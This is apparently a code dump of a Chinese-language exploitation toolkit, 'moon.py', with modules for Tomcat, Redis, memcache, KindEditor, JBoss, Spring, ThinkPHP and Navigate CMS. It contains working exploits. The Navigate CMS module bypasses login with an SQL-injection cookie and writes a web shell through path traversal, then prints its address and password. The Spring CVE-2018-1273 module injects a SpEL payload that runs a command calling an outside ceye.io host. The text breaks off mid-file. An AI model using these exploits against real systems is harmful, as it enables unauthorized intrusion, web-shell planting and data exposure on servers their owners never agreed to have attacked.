1108 | default='javax.faces.ViewState', metavar='PARAMETER') 1109 | group_advanced.add_argument("--show-payload", "-t", help="Print the generated payload.", 1110 | action='store_true') 1111 | group_advanced.add_argument("--gadget", help="Specify the type of Gadget to generate the payload automatically." 1112 | " (DEFAULT: commons-collections3.1 or groovy1 for JenKins)", 1113 | choices=['commons-collections3.1', 'commons-collections4.0', 'jdk7u21', 'jdk8u20', 'groovy1', 'dns'], 1114 | default='commons-collections3.1') 1115 | group_advanced.add_argument("--load-gadget", help="Provide your own gadget from file (a java serialized object in RAW mode)", 1116 | metavar='FILENAME') 1117 | group_advanced.add_argument("--force", "-F", 1118 | help="Force send java serialized gadgets to URL informed in -u parameter. This will " 1119 | "send the payload in multiple formats (eg. RAW, GZIPED and BASE64) and with " 1120 | "different Content-Types.",action='store_true') 1121 | 1122 | # required parameters --------------------------------------------------------------------------------------- 1123 | group_standalone.add_argument("-host", "-u", help="Host address to be checked (eg. -u http://192.168.0.10:8080)", 1124 | type=str) 1125 | 1126 | # scan's mode parameters --------------------------------------------------------------------------------------- 1127 | group_auto_scan.add_argument("-network", help="Network to be checked in CIDR format (eg. 10.0.0.0/8)", 1128 | type=network_args, default='192.168.0.0/24') 1129 | group_auto_scan.add_argument("-ports", help="List of ports separated by commas to be checked for each host " 1130 | "(eg. 8080,8443,8888,80,443)", type=str, default='8080,80') 1131 | group_auto_scan.add_argument("-results", help="File name to store the auto scan results", type=str, 1132 | metavar='FILENAME', default='jexboss_auto_scan_results.log') 1133 | 1134 | group_file_scan.add_argument("-file", help="Filename with host list to be scanned (one host per line)", 1135 | type=str, metavar='FILENAME_HOSTS') 1136 | group_file_scan.add_argument("-out", help="File name to store the file scan results", type=str, 1137 | metavar='FILENAME_RESULTS', default='jexboss_file_scan_results.log') 1138 | 1139 | gl_args = parser.parse_args() 1140 | 1141 | if (gl_args.mode == 'standalone' and gl_args.host is None) or \ 1142 | (gl_args.mode == 'file-scan' and gl_args.file is None) or \ 1143 | (gl_args.gadget == 'dns' and gl_args.dns is None): 1144 | banner() 1145 | print (help_usage()) 1146 | exit(0) 1147 | else: 1148 | configure_http_pool() 1149 | _updates.set_http_pool(gl_http_pool) 1150 | _exploits.set_http_pool(gl_http_pool) 1151 | banner() 1152 | if gl_args.proxy and not is_proxy_ok(): 1153 | exit(1) 1154 | if gl_args.gadget == 'dns': gl_args.cmd = gl_args.dns 1155 | main() 1156 | 1157 | if __name__ == '__testing__': 1158 | headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", 1159 | "Connection": "keep-alive", 1160 | "User-Agent": get_random_user_agent()} 1161 | 1162 | timeout = Timeout(connect=1.0, read=3.0) 1163 | gl_http_pool = PoolManager(timeout=timeout, cert_reqs='CERT_NONE') 1164 | _exploits.set_http_pool(gl_http_pool) 1165 | 1166 | 1167 | -------------------------------------------------------------------------------- /js_find/Main_js_find.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import js_find.js_find 3 | 4 | def exec(URL): 5 | js_find.js_find.attack(URL) 6 | 7 | 8 | if __name__ == "__main__": 9 | exec() 10 | -------------------------------------------------------------------------------- /js_find/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- -------------------------------------------------------------------------------- /js_find/js_find.py: -------------------------------------------------------------------------------- 1 | 2 | # coding: utf-8 3 | # 此页面代码主体修改自 https://threezh1.github.io/ By Threezh1 4 | 5 | import requests, argparse, sys, re 6 | from requests.packages import urllib3 7 | from urllib.parse import urlparse 8 | from bs4 import BeautifulSoup 9 | 10 | 11 | def parse_args(): 12 | parser = argparse.ArgumentParser(epilog='\tExample: \r\npython ' + sys.argv[0] + " -u http://www.baidu.com") 13 | parser.add_argument("-u", "--url", help="The website") 14 | parser.add_argument("-f", "--file", help="The file contains url or js") 15 | parser.add_argument("-ou", "--outputurl", help="Output file name. ") 16 | parser.add_argument("-os", "--outputsubdomain", help="Output file name. ") 17 | parser.add_argument("-j", "--js", help="Find in js file", action="store_true") 18 | parser.add_argument("-d", "--deep",help="Deep find", action="store_true") 19 | return parser.parse_args() 20 | 21 | 22 | # Regular expression comes from https://github.com/GerbenJavado/LinkFinder 23 | def extract_URL(JS): 24 | pattern_raw = r""" 25 | (?:"|') # Start newline delimiter 26 | ( 27 | ((?:[a-zA-Z]{1,10}://|//) # Match a scheme [a-Z]*1-10 or // 28 | [^"'/]{1,}\. # Match a domainname (any character + dot) 29 | [a-zA-Z]{2,}[^"']{0,}) # The domainextension and/or path 30 | | 31 | ((?:/|\.\./|\./) # Start with /,../,./ 32 | [^"'><,;| *()(%%$^/\\\[\]] # Next character can't be... 33 | [^"'><,;|()]{1,}) # Rest of the characters can't be 34 | | 35 | ([a-zA-Z0-9_\-/]{1,}/ # Relative endpoint with / 36 | [a-zA-Z0-9_\-/]{1,} # Resource name 37 | \.(?:[a-zA-Z]{1,4}|action) # Rest + extension (length 1-4 or action) 38 | (?:[\?|/][^"|']{0,}|)) # ? mark with parameters 39 | | 40 | ([a-zA-Z0-9_\-]{1,} # filename 41 | \.(?:php|asp|aspx|jsp|json| 42 | action|html|js|txt|xml) # . + extension 43 | (?:\?[^"|']{0,}|)) # ? mark with parameters 44 | ) 45 | (?:"|') # End newline delimiter 46 | """ 47 | pattern = re.compile(pattern_raw, re.VERBOSE) 48 | result = re.finditer(pattern, str(JS)) 49 | if result == None: 50 | return None 51 | js_url = [] 52 | return [match.group().strip('"').strip("'") for match in result 53 | if match.group() not in js_url] 54 | 55 | 56 | # Get the page source 57 | def Extract_html(URL): 58 | header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36"} 59 | try: 60 | raw = requests.get(URL, headers = header, timeout=3, verify=False) 61 | raw = raw.content.decode("utf-8", "ignore") 62 | return raw 63 | except: 64 | return None 65 | 66 | 67 | # Handling relative URLs 68 | def process_url(URL, re_URL): 69 | black_url = ["javascript:"] # Add some keyword for filter url. 70 | URL_raw = urlparse(URL) 71 | ab_URL = URL_raw.netloc 72 | host_URL = URL_raw.scheme 73 | if re_URL[0:2] == "//": 74 | result = host_URL + ":" + re_URL 75 | elif re_URL[0:4] == "http": 76 | result = re_URL 77 | elif re_URL[0:2] != "//" and re_URL not in black_url: 78 | if re_URL[0:1] == "/": 79 | result = host_URL + "://" + ab_URL + re_URL 80 | else: 81 | if re_URL[0:1] == ".": 82 | if re_URL[0:2] == "..": 83 | result = host_URL + "://" + ab_URL + re_URL[2:] 84 | else: 85 | result = host_URL + "://" + ab_URL + re_URL[1:] 86 | else: 87 | result = host_URL + "://" + ab_URL + "/" + re_URL 88 | else: 89 | result = URL 90 | return result 91 | 92 | 93 | def find_last(string,str): 94 | positions = [] 95 | last_position=-1 96 | while True: 97 | position = string.find(str,last_position+1) 98 | if position == -1:break 99 | last_position = position 100 | positions.append(position) 101 | return positions 102 | 103 | 104 | def find_by_url(url, js = False): 105 | if js == False: 106 | html_raw = Extract_html(url) 107 | if html_raw == None: 108 | print("Fail to access " + url) 109 | return None 110 | html = BeautifulSoup(html_raw, "html.parser") 111 | html_scripts = html.findAll("script") 112 | script_array = {} 113 | script_temp = "" 114 | for html_script in html_scripts: 115 | script_src = html_script.get("src") 116 | if script_src == None: 117 | script_temp += html_script.get_text() + "\n" 118 | else: 119 | purl = process_url(url, script_src) 120 | script_array[purl] = Extract_html(purl) 121 | script_array[url] = script_temp 122 | allurls = [] 123 | for script in script_array: 124 | temp_urls = extract_URL(script_array[script]) 125 | if len(temp_urls) == 0: continue 126 | for temp_url in temp_urls: 127 | allurls.append(process_url(script, temp_url)) 128 | result = [] 129 | for singerurl in allurls: 130 | url_raw = urlparse(url) 131 | domain = url_raw.netloc 132 | positions = find_last(domain, ".") 133 | miandomain = domain 134 | if len(positions) > 1:miandomain = domain[positions[-2] + 1:] 135 | suburl = urlparse(singerurl) 136 | subdomain = suburl.netloc 137 | if miandomain in subdomain or subdomain.strip() == "": 138 | if singerurl.strip() not in result: 139 | result.append(singerurl) 140 | return result 141 | return sorted(set(extract_URL(Extract_html(url)))) or None 142 | 143 | 144 | def find_subdomain(urls, mainurl): 145 | url_raw = urlparse(mainurl) 146 | domain = url_raw.netloc 147 | miandomain = domain 148 | positions = find_last(domain, ".") 149 | if len(positions) > 1:miandomain = domain[positions[-2] + 1:] 150 | subdomains = [] 151 | for url in urls: 152 | suburl = urlparse(url) 153 | subdomain = suburl.netloc 154 | if subdomain.strip() == "": continue 155 | if miandomain in subdomain: 156 | if subdomain not in subdomains: 157 | subdomains.append(subdomain) 158 | return subdomains 159 | 160 | 161 | def find_by_url_deep(url): 162 | html_raw = Extract_html(url) 163 | if html_raw == None: 164 | print("Fail to access " + url) 165 | return None 166 | html = BeautifulSoup(html_raw, "html.parser") 167 | html_as = html.findAll("a") 168 | links = [] 169 | for html_a in html_as: 170 | src = html_a.get("href") 171 | if src == "" or src == None: continue 172 | link = process_url(url, src) 173 | if link not in links: 174 | links.append(link) 175 | if links == []: return None 176 | print("ALL Find " + str(len(links)) + " links") 177 | urls = [] 178 | i = len(links) 179 | for link in links: 180 | temp_urls = find_by_url(link) 181 | if temp_urls == None: continue 182 | print("Remaining " + str(i) + " | Find " + str(len(temp_urls)) + " URL in " + link) 183 | for temp_url in temp_urls: 184 | if temp_url not in urls: 185 | urls.append(temp_url) 186 | i -= 1 187 | return urls 188 | 189 | 190 | def find_by_file(file_path, js=False): 191 | with open(file_path, "r") as fobject: 192 | links = fobject.read().split("\n") 193 | if links == []: return None 194 | print("ALL Find " + str(len(links)) + " links") 195 | urls = [] 196 | i = len(links) 197 | for link in links: 198 | if js == False: 199 | temp_urls = find_by_url(link) 200 | else: 201 | temp_urls = find_by_url(link, js=True) 202 | if temp_urls == None: continue 203 | print(str(i) + " Find " + str(len(temp_urls)) + " URL in " + link) 204 | for temp_url in temp_urls: 205 | if temp_url not in urls: 206 | urls.append(temp_url) 207 | i -= 1 208 | return urls 209 | 210 | 211 | def giveresult(urls, domian): 212 | print("Find " + str(len(urls)) + " URL:") 213 | for url in urls: 214 | headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36', 'Connection': 'close'} 215 | try: 216 | response = requests.get(url, headers=headers, timeout=60, verify=False).status_code 217 | response_len = len(requests.get(url, headers=headers, timeout=60, verify=False).text) 218 | print('status_code:', ' ',str(response), ' ', 'response_len:', str(response_len),' ',url) 219 | continue 220 | except Exception as e: 221 | print(url, '页面访问错误:', f'Error2: {str(e)}') 222 | continue 223 | # print(url) 224 | subdomains = find_subdomain(urls, domian) 225 | print("\nFind " + str(len(subdomains)) + " Subdomain:") 226 | for subdomain in subdomains: 227 | print(subdomain) 228 | 229 | 230 | def attack(URL): 231 | urllib3.disable_warnings() 232 | args_url = URL 233 | try: 234 | urls = find_by_url(args_url) 235 | giveresult(urls, args_url) 236 | print('[+]当前页面爬取完毕!') 237 | except Exception: 238 | print('[-]当前页面爬取失败!') 239 | try: 240 | urls = find_by_url_deep(args_url) 241 | print('[+]深度爬取成功!') 242 | except Exception: 243 | print('[-]深度爬取失败!') 244 | 245 | 246 | if __name__ == "__main__": 247 | attack() 248 | -------------------------------------------------------------------------------- /kindeditor/Main_kindeditor.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import os 3 | import kindeditor.kindeditor_under_4_1_5_fileupload 4 | 5 | 6 | def exec(URL): 7 | kindeditor.kindeditor_under_4_1_5_fileupload.attack(URL) 8 | 9 | 10 | 11 | 12 | if __name__ == "__main__": 13 | exec() 14 | -------------------------------------------------------------------------------- /kindeditor/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- -------------------------------------------------------------------------------- /kindeditor/kindeditor_under_4_1_5_fileupload.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import sys 3 | import requests 4 | import time 5 | 6 | ''' 7 | Usage: 8 | moon.py -u kindeditor http://127.0.0.1:8080/kidneditor 9 | 影响:kindeditor<=4.1.5 文件上传漏洞 可上传txt和html,用作钓鱼或者跳转博彩网站 10 | 检测方式:这里采用版本判断和查看上传文件的方式确认漏洞是否存在 11 | 首先查询编辑器版本,如果在4.1.5版本之下,且存在相应的上传文件,则认为漏洞存在 12 | ''' 13 | 14 | def attack(URL): 15 | print('[+]开始检测-kindeditor<=4.1.5文件上传漏洞。[+]') 16 | user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 17 | headers={"User-Agent":user_agent} 18 | 19 | #获取版本 20 | try: 21 | url1 = URL+'/kindeditor-min.js' 22 | verify_response = requests.get(url1, headers=headers) 23 | # print(verify_response.status_code) 24 | print('开始检查kindeditor版本,kindeditor<=4.1.5存在文件上传漏洞:') 25 | if verify_response.status_code ==200: 26 | print('此kindeditor的版本为:',verify_response.content[:40]) 27 | print('-----------------------------------------------------') 28 | else: 29 | print('未发现获取版本的文件:',verify_response.status_code) 30 | print('-----------------------------------------------------') 31 | except: 32 | print('获取版本失败。') 33 | 34 | #检测上传页面是否存在 35 | urls = ( 36 | '/asp/upload_json.asp', 37 | '/asp.net/upload_json.ashx', 38 | '/jsp/upload_json.jsp', 39 | '/php/upload_json.php' 40 | ) 41 | for url in urls: 42 | url = URL + url 43 | try: 44 | verify_response = requests.get(url, headers=headers) 45 | 46 | if verify_response.status_code == 200: 47 | try: 48 | print('存在此页面:'+url+' '+str(verify_response.status_code)) 49 | except: 50 | pass 51 | else : 52 | print('未发现此页面:'+url+' '+str(verify_response.status_code)) 53 | continue 54 | except : 55 | print("Someerror!") 56 | print('[+]检测结束-kindeditor<=4.1.5文件上传漏洞。[+]') 57 | print('\n') 58 | 59 | if __name__ == "__main__": 60 | attack('') 61 | 62 | 63 | -------------------------------------------------------------------------------- /memcache_vuln/Main_memcache_vuln.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import memcache_vuln.memcache_un 3 | 4 | 5 | def exec(URL): 6 | # memcahce_un.attack(URL) 7 | memcache_vuln.memcache_un.attack(URL) 8 | 9 | 10 | if __name__ == "__main__": 11 | exec() 12 | -------------------------------------------------------------------------------- /memcache_vuln/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | -------------------------------------------------------------------------------- /memcache_vuln/memcache_un.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import memcache 3 | 4 | 5 | def attack(URL): 6 | list = URL.split('/') 7 | try: 8 | print('[+]开始检测-memcache未授权访问漏洞。[+]') 9 | mc = memcache.Client([list[-1]], debug=True) 10 | print('[!]memcache获取信息结果:[!]') 11 | ret = mc.get_stats() 12 | print(ret) 13 | except: 14 | print('[-]未发现-发现-memcache未授权访问漏洞。[-]') 15 | pass 16 | print('[+]检测结束-memcache未授权访问漏洞。[+]') 17 | 18 | 19 | if __name__ == "__main__": 20 | attack() 21 | -------------------------------------------------------------------------------- /moon.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import sys 3 | import tomcat.Main_tomcat 4 | import fckeditor.Main_fckeditor 5 | import weblogic.Main_weblogic 6 | import iis.Main_iis 7 | import docker_vuln.Main_docker 8 | import redis_vuln.Main_redis 9 | import zabbix_vuln.Main_zabbix 10 | import navigate_vuln.Main_navigate 11 | import gatepass_vuln.Main_gatepass 12 | import spring_vuln.Main_spring 13 | import jboss.Main_jboss 14 | import kindeditor.Main_kindeditor 15 | import durpal.Main_durpal 16 | import bf_dicts.Main_bf 17 | import thinkphp.Main_thinkphp 18 | import memcache_vuln.Main_memcache_vuln 19 | import js_find.Main_js_find 20 | import search_exploits.Main_search_exploits 21 | import activemq_vuln.Main_activemq 22 | 23 | 24 | if __name__ == "__main__": 25 | 26 | #使用说明 27 | if len(sys.argv) < 3 or sys.argv[1]=="-h": 28 | print(''' 29 | 漏洞检测: 30 | userage: python -u module http://xx.xx.xx.xx:xx 31 | modul: tomcat fck weblogic iis docker redis zabbix navigate gatepass kindeditor thinkphp memcache actviemq 32 | IP归属查询: 33 | userage: python -u module www.xxxxx.com/xx.xx.xx.xx 34 | modul:ip ipq 35 | Js中敏感信息收集: 36 | userage: python -u module http://xx.xx.xx.xx:xx 37 | modul:js 38 | 历史漏洞查询: 39 | modul: exploits 40 | ''') 41 | 42 | #漏洞利用 43 | elif sys.argv[1] == '-u': 44 | # 处理url末尾可能存在的/ 45 | if sys.argv[3][-1] != '/': 46 | pass 47 | else: 48 | sys.argv[3] = sys.argv[3][0:-1] 49 | print('[*]目标:'+sys.argv[3]) 50 | 51 | if sys.argv[2] == 'tomcat': 52 | tomcat.Main_tomcat.exec(sys.argv[3]) 53 | elif sys.argv[2] == 'fck': 54 | fckeditor.Main_fckeditor.exec(sys.argv[3]) 55 | elif sys.argv[2] == 'weblogic': 56 | weblogic.Main_weblogic.exec(sys.argv[3]) 57 | elif sys.argv[2] == 'iis': 58 | iis.Main_iis.exec(sys.argv[3]) 59 | elif sys.argv[2] == 'docker': 60 | docker_vuln.Main_docker.exec(sys.argv[3]) 61 | elif sys.argv[2] == 'redis': 62 | redis_vuln.Main_redis.exec(sys.argv[3]) 63 | elif sys.argv[2] == 'zabbix': 64 | zabbix_vuln.Main_zabbix.exec(sys.argv[3]) 65 | elif sys.argv[2] == 'navigate': 66 | navigate_vuln.Main_navigate.exec(sys.argv[3]) 67 | elif sys.argv[2] == 'gatepass': 68 | gatepass_vuln.Main_gatepass.exec(sys.argv[3]) 69 | elif sys.argv[2] == 'spring': 70 | spring_vuln.Main_spring.exec(sys.argv[3]) 71 | elif sys.argv[2] == 'jboss': 72 | jboss.Main_jboss.exec(sys.argv[3]) 73 | elif sys.argv[2] == 'kindeditor': 74 | kindeditor.Main_kindeditor.exec(sys.argv[3]) 75 | elif sys.argv[2] == 'drupal': 76 | durpal.Main_durpal.exec(sys.argv[3]) 77 | elif sys.argv[2] == 'thinkphp': 78 | thinkphp.Main_thinkphp.exec(sys.argv[3]) 79 | elif sys.argv[2] == 'memcache': 80 | memcache_vuln.Main_memcache_vuln.exec(sys.argv[3]) 81 | elif sys.argv[2] == 'js': 82 | js_find.Main_js_find.exec(sys.argv[3]) 83 | elif sys.argv[2] == 'exploits': 84 | search_exploits.Main_search_exploits.exec(sys.argv[3]) 85 | elif sys.argv[2] == 'activemq': 86 | activemq_vuln.Main_activemq.exec(sys.argv[3]) 87 | 88 | else: 89 | print(''' 90 | 漏洞检测: 91 | userage: python -u module http://xx.xx.xx.xx:xx 92 | modul: tomcat fck weblogic iis docker redis zabbix navigate gatepass kindeditor thinkphp memcache activemq 93 | IP归属查询: 94 | userage: python -u module www.xxxxx.com/xx.xx.xx.xx 95 | modul:ip ipq 96 | Js中敏感信息收集: 97 | userage: python -u module http://xx.xx.xx.xx:xx 98 | modul:js 99 | 历史漏洞查询: 100 | modul: exploits 101 | ''') 102 | elif sys.argv[1] == '-p': 103 | print('[+]检测地址:'+sys.argv[2]+sys.argv[3]+sys.argv[4]) 104 | bf_dicts.Main_bf.exec(sys.argv[2],sys.argv[3],sys.argv[4]) 105 | 106 | else: 107 | print(''' 108 | 漏洞检测: 109 | userage: python -u module http://xx.xx.xx.xx:xx 110 | modul: tomcat fck weblogic iis docker redis zabbix navigate gatepass kindeditor thinkphp memcache activemq 111 | IP归属查询: 112 | userage: python -u module www.xxxxx.com/xx.xx.xx.xx 113 | modul:ip ipq 114 | Js中敏感信息收集: 115 | userage: python -u module http://xx.xx.xx.xx:xx 116 | modul:js 117 | 历史漏洞查询: 118 | modul: exploits 119 | ''') 120 | -------------------------------------------------------------------------------- /navigate_vuln/88.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /navigate_vuln/Main_navigate.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import navigate_vuln.navigate_Unauthenticated_Remote_Code_Execution_CVE_2018_17553 3 | 4 | 5 | def exec(URL): 6 | navigate_vuln.navigate_Unauthenticated_Remote_Code_Execution_CVE_2018_17553.attack(URL) 7 | 8 | 9 | if __name__ == "__main__": 10 | exec() 11 | -------------------------------------------------------------------------------- /navigate_vuln/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- -------------------------------------------------------------------------------- /navigate_vuln/navigate_Unauthenticated_Remote_Code_Execution_CVE_2018_17553.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import requests 3 | from requests_toolbelt.multipart.encoder import MultipartEncoder 4 | import sys 5 | 6 | r''' 7 | Usage: 8 | moon.py -u navigate http://x.x.x.x:xx 9 | V2.8版本测试存在此漏洞。 10 | 参考 https://www.exploit-db.com/exploits/45561/ 11 | https://github.com/rapid7/metasploit-framework/pull/10704 12 | 上面msf的利用脚本会向该cms的/navigate/navigate_info.php文件写入shell,以下脚本也是利用的这个思路. 13 | 因此如果/navigate/navigate_info.php文件不存在,会造成shell写入失败。 14 | Navigate CMS v2.8 测试成功 15 | 绕过登录限制 16 | cookie' => 'navigate-user=\" OR TRUE--%20' 17 | ''' 18 | 19 | 20 | def attack(URL): 21 | print('[+]开始检测-navigate_Unauthenticated_Remote_Code_Execution_CVE-2018-17553。[+]') 22 | user_agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36" 23 | headers={"User-Agent":user_agent} 24 | try: 25 | urls = [URL + '/login.php',URL+'/navigate/login.php'] 26 | for url in urls: 27 | print('检测的URL为:'+url) 28 | cookies = {'navigate-user':r'\" OR TRUE--%20'} 29 | r = requests.get(url,headers=headers,cookies=cookies,verify=False,allow_redirects=False) 30 | if r.status_code == 302: 31 | print('[+]返回值为:'+str(r.status_code)+' 可能存在漏洞。') 32 | #print(r.cookies.items()[0][1])#获取session_id 33 | global Session_id 34 | Session_id = r.cookies.items()[0][1] 35 | else: 36 | print('[-]返回值为:' + str(r.status_code) + ' 不存在漏洞。') 37 | except: 38 | print('[-]未发现该漏洞。!') 39 | else: 40 | try: 41 | url = URL + '/navigate/navigate_info.php' 42 | r = requests.get(url) 43 | scode = r.status_code 44 | if scode == 200: 45 | print('[+]访问/navigate/navigate_info.php成功,开始写入。') 46 | try: 47 | pwd = sys.argv[0][:33] # 获取当前文件夹的路径 48 | url = URL + f'/navigate/navigate_upload.php?id=../../../navigate_info.php&session_id={Session_id}&engine=picnik' 49 | m = MultipartEncoder(fields={ 50 | 'Content-Disposition': 'form-data; name="file"; filename="tCc2QJ7PUxSC"', 51 | 'file': ('shellname', open(f'{pwd}\\navigate_vuln\\88.php', 'rb'), 'image/jpeg'), 52 | }) 53 | headers = { 54 | 'Content-Type': m.content_type, 55 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36', 56 | } 57 | r = requests.post(url, data=m, headers=headers) 58 | #print(r.status_code) #值为200上传正常 59 | print('一句话地址为:' + URL + '/navigate/navigate_info.php') 60 | print('密码为:' + 'tBjyWW3456tBjyWWtBjyWW87ttBjyWW') 61 | except: 62 | print('上传shell发生错误。') 63 | else: 64 | print('[-]访问/navigate/navigate_info.php失败,无法进行shell写入。') 65 | except: 66 | print('[-]访问/navigate/navigate_info.php发生错误。') 67 | 68 | print('[+]检测结束-navigate_Unauthenticated_Remote_Code_Execution_CVE-2018-17553。[+]') 69 | print('\n') 70 | 71 | 72 | if __name__ == '__main__': 73 | attack() 74 | -------------------------------------------------------------------------------- /redis_vuln/Main_redis.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import redis_vuln.redis_unauthorized 3 | 4 | 5 | def exec(URL): 6 | redis_vuln.redis_unauthorized.attack(URL) 7 | 8 | 9 | if __name__ == "__main__": 10 | exec() 11 | -------------------------------------------------------------------------------- /redis_vuln/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- -------------------------------------------------------------------------------- /redis_vuln/redis_unauthorized.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import redis 3 | import re 4 | 5 | ''' 6 | Usage: 7 | moon.py -u redis http://127.0.0.1:6379 8 | redis未授权访问漏洞 9 | ''' 10 | 11 | 12 | def attack(URL): 13 | print('[+]开始检测-Redis未授权访问漏洞。[+]') 14 | # print(re.findall('//(.*?):',URL)[0])#获取IP 15 | # print(re.findall(':(\w*?)$',URL)[0])#获取端口 16 | try: 17 | r = redis.StrictRedis(host=re.findall('//(.*?):',URL)[0], port=re.findall(':(\w*?)$',URL)[0], db=0) 18 | print('获取连接成功。客户列表为:'+str(r.client_list())) 19 | except IndexError: 20 | try: 21 | r = redis.StrictRedis(host=re.findall('(.*?):', URL)[0], port=re.findall(':(\w*?)$', URL)[0], db=0) 22 | print('获取连接成功。客户列表为:' + str(r.client_list())) 23 | except redis.exceptions.ResponseError: 24 | print('[-]访问受限:NOAUTH Authentication required') 25 | except redis.exceptions.ConnectionError: 26 | print('获取连接失败。') 27 | 28 | print('[+]检测结束-Redis未授权访问漏洞。[+]') 29 | 30 | 31 | if __name__ == "__main__": 32 | attack() 33 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | bs4 3 | requests_toolbelt 4 | docker 5 | redis 6 | python3-memcached 7 | lxml 8 | struct 9 | socket -------------------------------------------------------------------------------- /search_exploits/Main_search_exploits.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import search_exploits.search_exploit 3 | 4 | 5 | def exec(URL): 6 | search_exploits.search_exploit.attack(URL) 7 | 8 | 9 | if __name__ == "__main__": 10 | exec() 11 | -------------------------------------------------------------------------------- /search_exploits/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- -------------------------------------------------------------------------------- /search_exploits/search_exploit.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import requests 3 | 4 | 5 | def attack(URL): 6 | print(f'[+]开始在exploitalert中搜索 {URL} 存在的历史漏洞。') 7 | payload = {'name': URL} 8 | r = requests.get("https://www.exploitalert.com/api/search-exploit", params=payload) 9 | if r.text == '': 10 | print('未发现历史漏洞!') 11 | else: 12 | for json in r.json(): 13 | print(json) 14 | print(f'[+]在exploitalert中搜索 {URL} 存在的历史漏洞结束。') 15 | 16 | 17 | if __name__ == "__main__": 18 | attack() 19 | -------------------------------------------------------------------------------- /spring_vuln/CVE_2018_1273.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import requests 3 | import random 4 | 5 | ''' 6 | moon.py -u spring http://xxxx.xxxx.xxxx.xxxx:xx 7 | 这里利用脚本针对的是spring官方的web样例中的注册页面,实际中未必适用 8 | ''' 9 | 10 | 11 | def attack(url): 12 | URL1 = url + '/users' 13 | try: 14 | re = requests.get(URL1, verify=False, timeout=5) 15 | except Exception: 16 | print('Some error!') 17 | else: 18 | if re.status_code == 200: 19 | print('[+]存在风险页面,开始检测:', URL1) 20 | try: 21 | URL2 = url + '/users?page=&size=5' 22 | headers = {"User-Agent": 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36', 23 | "Referer": URL1, 24 | "Content-Type": 'application/x-www-form-urlencoded' 25 | } 26 | randomint = random.randint(100000, 999999) 27 | data = f'username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("ping {randomint}_CVE_2018_1273.e7wqoz.ceye.io")]=&password=&repeatedPassword=' 28 | re1 = requests.post(URL2, data=data, headers=headers) 29 | print('一般执行成功返回值为500,此次返回值为:', re1.status_code) 30 | print('此处利用ceye来确认漏洞,请登录相关账户进行确认:', f" {randomint}_CVE_2018_1273.e7wqoz.ceye.io") 31 | except Exception: 32 | print('[-]执行payload出错!') 33 | else: 34 | print('[-]未发现漏洞页面:', URL1, re.status_code) 35 | 36 | 37 | if __name__ == "__main__": 38 | attack() 39 | -------------------------------------------------------------------------------- /spring_vuln/Main_spring.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import spring_vuln.CVE_2018_1273 3 | 4 | 5 | def exec(URL): 6 | spring_vuln.CVE_2018_1273.attack(URL) 7 | 8 | 9 | if __name__ == "__main__": 10 | exec() 11 | -------------------------------------------------------------------------------- /spring_vuln/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- -------------------------------------------------------------------------------- /thinkphp/Main_thinkphp.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import thinkphp.thinkphp5_inj_info 3 | import thinkphp.thinkphp5_x_rce 4 | import thinkphp.thinkphp_before5_0_23_rce 5 | 6 | 7 | def exec(URL): 8 | thinkphp.thinkphp5_inj_info.attack(URL) 9 | thinkphp.thinkphp5_x_rce.attack(URL) 10 | thinkphp.thinkphp_before5_0_23_rce.attack(URL) 11 | 12 | 13 | if __name__ == "__main__": 14 | exec() 15 | -------------------------------------------------------------------------------- /thinkphp/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- -------------------------------------------------------------------------------- /thinkphp/thinkphp5_inj_info.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import requests 3 | from bs4 import BeautifulSoup 4 | 5 | ''' 6 | moon.py -u thinkphp http://xxxx.xxxx.xxxx.xxxx:xx 7 | ThinkPHP5 SQL注入漏洞 && 敏感信息泄露 8 | 